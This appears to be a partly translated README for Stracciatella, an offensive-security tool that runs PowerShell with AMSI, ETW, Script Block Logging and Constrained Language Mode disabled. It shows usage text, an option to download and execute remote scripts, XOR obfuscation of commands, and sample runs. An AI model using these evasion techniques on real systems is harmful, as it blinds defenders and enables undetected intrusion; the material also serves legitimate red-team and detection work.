
Espaço de execução do Powershell seguro para OpSec a partir de C# (também conhecido como SharpPick) com AMSI, Modo de Linguagem Restrito e Registro de Bloco de Script desabilitados na inicialização.
Espaço de execução do PowerShell a partir de C# (técnica SharpPick) com AMSI, ETW e Registro de Bloco de Script desativados para seu prazer.
Atualmente, quando o PowerShell foi severamente instrumentado pelo uso de técnicas como:
Atacantes avançados devem encontrar maneiras de contornar esses esforços para entregar exercícios sofisticados de simulação adversarial. Para ajudar nesses esforços, o seguinte projeto foi criado.
Este programa se baseia em bypasses para técnicas específicas incluídas em:
Que por sua vez foi baseado nas seguintes pesquisas:
A ideia do SharpPick, de executar scripts PowerShell a partir de um assembly C# usando Runspaces, também não é nova e foi implementada pela primeira vez por Lee Christensen (@tifkin_) em seu:
Além disso, o código-fonte empresta a implementação de CustomPSHost de Lee.
Este projeto herda das pesquisas acima e da grande comunidade de segurança para fornecer um ambiente PowerShell quase eficaz com defesas desabilitadas na inicialização.
Agora compila facilmente com .NET 4.0, enquanto que se compilado com .NET Framework 4.7.1+, uma funcionalidade adicional é incluída que permite descarregar DLLs que constituem artefatos de bypass de CLM e tenta excluí-las depois (honestamente, funciona mal).
O melhor resultado é obtido com Stracciatella compilado com .NET 4.0.
Há algumas opções disponíveis:
PS D:\> Stracciatella -h
:: Stracciatella - Powershell runspace with AMSI, ETW and Script Block Logging disabled.
Mariusz Banach / mgeeky, '19-22 <[email protected]>
v0.7
Usage: stracciatella.exe [options] [command]
-s <path>, --script <path> - Path to file containing Powershell script to execute. If not options given, will enter
a pseudo-shell loop. This can be also a HTTP(S) URL to download & execute powershell script.
-v, --verbose - Prints verbose informations
-n, --nocleanup - Don't remove CLM disable leftovers (DLL files in TEMP and COM registry keys).
By default these are going to be always removed.
-C, --leaveclm - Don't attempt to disable CLM. Stealthier. Will avoid leaving CLM disable artefacts undeleted.
-f, --force - Proceed with execution even if Powershell defenses were not disabled.
By default we bail out on failure.
-c, --command - Executes the specified commands You can either use -c or append commands after
stracciatella parameters: cmd> straciatella ipconfig /all
If command and script parameters were given, executes command after running script.
-x <key>, --xor <key> - Consider input as XOR encoded, where <key> is a one byte key in decimal
(prefix with 0x for hex)
-p <name>, --pipe <name> - Read powershell commands from a specified named pipe. Command must be preceded with 4 bytes of
its length coded in little-endian (Length-Value notation).
-t <millisecs>, --timeout <millisecs>
- Specifies timeout for pipe read operation (in milliseconds). Default: 60 secs. 0 - infinite.
-e, --cmdalsoencoded - Consider input command (specified in '--command') encoded as well.
Decodes input command after decoding and running input script file.
By default we only decode input file and consider command given in plaintext
O programa aceita comando e caminho de arquivo de script como entrada. Ambos são opcionais; se nenhum for fornecido, um pseudo-shell será iniciado. Tanto o comando quanto o script podem ser codificados usando XOR de um byte (produzirá saída codificada em Base64) para melhor experiência de OpSec.
Aqui estão alguns exemplos que apresentam casos de uso:
PS D:\> Stracciatella.exe -v
:: Stracciatella - Powershell runspace with AMSI, ETW and Script Block Logging disabled.
Mariusz Banach / mgeeky, '19-22 <[email protected]>
v0.7
[.] Powershell's version: 5.1
[.] Language Mode: FullLanguage
[+] No need to disable Constrained Language Mode. Already in FullLanguage.
[+] Script Block Logging Disabled.
[+] AMSI Disabled.
[+] ETW Disabled.
Stracciatella D:\> $PSVersionTable
Name Value
---- -----
PSVersion 5.1.18362.1
PSEdition Desktop
PSCompatibleVersions {1.0, 2.0, 3.0, 4.0...}
BuildVersion 10.0.18362.1
CLRVersion 4.0.30319.42000
WSManStackVersion 3.0
PSRemotingProtocolVersion 2.3
SerializationVersion 1.1.0.1
Primeiro, para preparar instruções codificadas, podemos usar o script encoder.py incluso, que pode ser usado da seguinte forma:
PS D:\> python encoder.py -h
usage: encoder.py [options] <command|file>
positional arguments:
command Specifies either a command or script file's path for encoding
optional arguments:
-h, --help show this help message and exit
-x KEY, --xor KEY Specifies command/file XOR encode key (one byte)
-o PATH, --output PATH
(optional) Output file. If not given - will echo output to stdout
PS D:\> python encoder.py -x 0x31 "Write-Host \"It works like a charm!\" ; $ExecutionContext.SessionState.LanguageMode"
ZkNYRVQceV5CRRETeEURRl5DWkIRXVhaVBFQEVJZUENcEBMRChEVdElUUkRFWF5fcl5fRVRJRR9iVEJCWF5fYkVQRVQffVBfVkRQVlR8XlVU
Em seguida, alimentamos a saída do encoder.py como entrada sendo um comando codificado para o Stracciatella:
PS D:\> Stracciatella.exe -v -x 0x31 -c "ZkNYRVQceV5CRRETeEURRl5DWkIRXVhaVBFQEVJZUENcEBMRChEVdElUUkRFWF5fcl5fRVRJRR9iVEJCWF5fYkVQRVQffVBfVkRQVlR8XlVU" .\Test2.ps1
:: Stracciatella - Powershell runspace with AMSI, ETW and Script Block Logging disabled.
Mariusz Banach / mgeeky, '19-22 <[email protected]>
v0.7